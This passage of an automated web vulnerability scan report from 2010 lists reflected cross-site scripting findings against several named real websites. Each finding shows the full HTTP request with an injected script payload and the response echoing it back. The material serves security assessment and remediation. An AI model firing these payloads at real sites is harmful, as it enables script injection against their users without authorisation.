HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=q7ui948jpve3p9ejed9jm7t136; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=q7ui948jpve3p9ejed9jm7t136; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxN3VpOTQ4anB2ZTNwOWVqZWQ5am03dDEzNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzOTA7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... inks/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5c0532"-alert(1)-"46d4c29db7a&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") { scr = scripts[i]; break;
The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5922"-alert(1)-"bfb2c9efafa was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2d5922"-alert(1)-"bfb2c9efafa&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:25 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=ciellvhjsjjfeliq3obqotj6c5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=ciellvhjsjjfeliq3obqotj6c5; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjaWVsbHZoanNqamZlbGlxM29icW90ajZjNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzODU7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... ists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2d5922"-alert(1)-"bfb2c9efafa&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") { scr = scripts[i]; ...[SNIP]...
The value of the widget_src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a278"-alert(1)-"bcc24607399 was submitted in the widget_src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson7a278"-alert(1)-"bcc24607399&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:21 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=9nhcug52lv93jsjrii6t58oct0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=9nhcug52lv93jsjrii6t58oct0; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI5bmhjdWc1Mmx2OTNqc2pyaWk2dDU4b2N0MCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzODE7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... m/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson7a278"-alert(1)-"bcc24607399&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= ...[SNIP]...
The value of the feed request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e292'%3balert(1)//c93c93cdbca was submitted in the feed parameter. This input was echoed as 3e292';alert(1)//c93c93cdbca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /widget/display/publish2_widget_html_61657798d9d56955d570ac504ad152e9/?feed=3e292'%3balert(1)//c93c93cdbca&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTA7
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNzY7; path=/ Content-Length: 6910 Content-Type: application/x-javascript
(function($){
var widget = function() { var l = links(), h = html();
return { init: function() { // JSON cache does not exist if (l.json.title == un ...[SNIP]... }; };
2.402. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.seomoz.org
Path:
/blog
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe06"><script>alert(1)</script>5c2614ea387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3fe06\"><script>alert(1)</script>5c2614ea387 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog?3fe06"><script>alert(1)</script>5c2614ea387=1 HTTP/1.1 Host: www.seomoz.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:17:07 GMT Server: Apache/2.2.9 (Ubuntu) DAV/2 PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: SSSO=Q29uZmlnfGE6Mzp7czo0OiJyYW5kIjtpOjE1NjkxOTY4NzE7czo0OiJ0aW1lIjtpOjEyOTI1MTYyMjc7czo5OiJ1c2VyQWdlbnQiO3M6MzI6IjcwY2M4NDUwNzc1NmFjZjE4MTExMWM2MDkwYjQ3OGFmIjt9%7C4F%2F0Eig8qBjhRkHqNT0tdPpHYao%3D; expires=Thu, 16-Dec-2010 16:17:08 GMT; path=/; domain=.seomoz.org Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 54831
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.403. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.seomoz.org
Path:
/blog
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f300d</script><script>alert(1)</script>9d81e504b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog?f300d</script><script>alert(1)</script>9d81e504b1b=1 HTTP/1.1 Host: www.seomoz.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:17:20 GMT Server: Apache/2.2.9 (Ubuntu) DAV/2 PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: SSSO=Q29uZmlnfGE6Mzp7czo0OiJyYW5kIjtpOjEzMDc4MzA4MTtzOjQ6InRpbWUiO2k6MTI5MjUxNjI0MDtzOjk6InVzZXJBZ2VudCI7czozMjoiNzBjYzg0NTA3NzU2YWNmMTgxMTExYzYwOTBiNDc4YWYiO30%3D%7C8%2B8%2B85yqczh9%2BbU%2FyVNZiCmdsqI%3D; expires=Thu, 16-Dec-2010 16:17:20 GMT; path=/; domain=.seomoz.org Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 54973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbdf"><script>alert(1)</script>f9b4b2b9b3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico2dbdf"><script>alert(1)</script>f9b4b2b9b3b HTTP/1.1 Host: www.sixapart.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 14:04:45 GMT Server: Apache Content-Location: error.html.en Vary: negotiate,accept-language,Accept-Encoding TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en Connection: keep-alive Content-Length: 6092
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21bc1"><script>alert(1)</script>ddc017331 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns21bc1"><script>alert(1)</script>ddc017331/at HTTP/1.1 Host: www.sixapart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 13:17:20 GMT Server: Apache Content-Location: error.html.en TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 6084 Content-Type: text/html; charset=UTF-8 Content-Language: en
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fe9"><script>alert(1)</script>ea15281548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/atd2fe9"><script>alert(1)</script>ea15281548 HTTP/1.1 Host: www.sixapart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 13:17:21 GMT Server: Apache Content-Location: error.html.en TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 6085 Content-Type: text/html; charset=UTF-8 Content-Language: en
2.407. http://www.sixapart.com/ns/at [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sixapart.com
Path:
/ns/at
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c1c"><script>alert(1)</script>0ccf61bcd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/at?49c1c"><script>alert(1)</script>0ccf61bcd1e=1 HTTP/1.1 Host: www.sixapart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 13:17:20 GMT Server: Apache Content-Location: error.html.en TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 6089 Content-Type: text/html; charset=UTF-8 Content-Language: en
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926f7"><script>alert(1)</script>6a5b0f0910d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C926f7"><script>alert(1)</script>6a5b0f0910d/script%3Eddc017331/at HTTP/1.1 Host: www.sixapart.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 14:04:54 GMT Server: Apache Content-Location: error.html.en Vary: negotiate,accept-language,Accept-Encoding TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en Connection: keep-alive Content-Length: 6141
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed08d"><script>alert(1)</script>5a3c5a87edb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331ed08d"><script>alert(1)</script>5a3c5a87edb/at HTTP/1.1 Host: www.sixapart.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 14:05:06 GMT Server: Apache Content-Location: error.html.en Vary: negotiate,accept-language,Accept-Encoding TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en Connection: keep-alive Content-Length: 6141
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6288e"><script>alert(1)</script>2f02a15c966 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at6288e"><script>alert(1)</script>2f02a15c966 HTTP/1.1 Host: www.sixapart.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 14:05:17 GMT Server: Apache Content-Location: error.html.en Vary: negotiate,accept-language,Accept-Encoding TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en Connection: keep-alive Content-Length: 6141
2.411. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c43d"><script>alert(1)</script>8f3b4c0a94c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at?5c43d"><script>alert(1)</script>8f3b4c0a94c=1 HTTP/1.1 Host: www.sixapart.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 14:04:20 GMT Server: Apache Content-Location: error.html.en Vary: negotiate,accept-language,Accept-Encoding TCN: choice X-Powered-By: PHP/5.0.4 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en Connection: keep-alive Content-Length: 6144
The value of the mod request parameter is copied into the HTML document as text between TITLE tags. The payload 46c24</title><script>alert(1)</script>8a8f7e7c860 was submitted in the mod parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ME2/dirmod.asp?sid=4936C38869DA46FB97FA61453F6E697F&nm=Conferences+and+Events&type=WebTitle&mod=WebTitles46c24</title><script>alert(1)</script>8a8f7e7c860&mid=DD35BDEB326347298C16B515B4CB888F&tier=3&id=592A19FA4327487D8B0A16ED1D897004 HTTP/1.1 Host: www.staffingindustry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 13:17:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private cache-control: no-cache cache-control: no-store Content-Length: 296 Content-Type: text/html Expires: Wed, 15 Dec 2010 13:17:30 GMT Set-Cookie: IpAccessUser=Y; expires=Fri, 17-Dec-2010 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCQQTABRA=FDNLHOHAKKDINMBKPEJHLCKH; path=/ Cache-control: no-cache
<html> <head>
<title><div><b>Error:</b> Centralpoint</div><div><b>Source:</b> Centralpoint</div><div><b>Description:</b> Module could not be found.</div><div><b>Method:</b> CpConsole.Sql.Ge ...[SNIP]... </b> WebTitles46c24</title><script>alert(1)</script>8a8f7e7c860</div>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a5acc<script>alert(1)</script>fdd3d950f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/email_marketing_insights'a5acc<script>alert(1)</script>fdd3d950f0d HTTP/1.1 Host: www.strongmail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=75348304.1292505746.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; s_sq=%5B%5BB%5D%5D; __utma=75348304.758064691.1292505746.1292505746.1292505746.1; _mkto_trk=id:732-LLR-572&token:_mch-strongmail.com-1292505745708-88199; _jsuid=2323480347906359467; __utmc=75348304; __utmb=75348304.1.10.1292505746;
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:18:57 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10616
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/email_marketing_insights'a5acc<script>alert(1)</script>fdd3d950f0d<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d67d<script>alert(1)</script>2aa12a5bf2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/email_marketing_insights3d67d<script>alert(1)</script>2aa12a5bf2f/ HTTP/1.1 Host: www.strongmail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 13:30:18 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10616
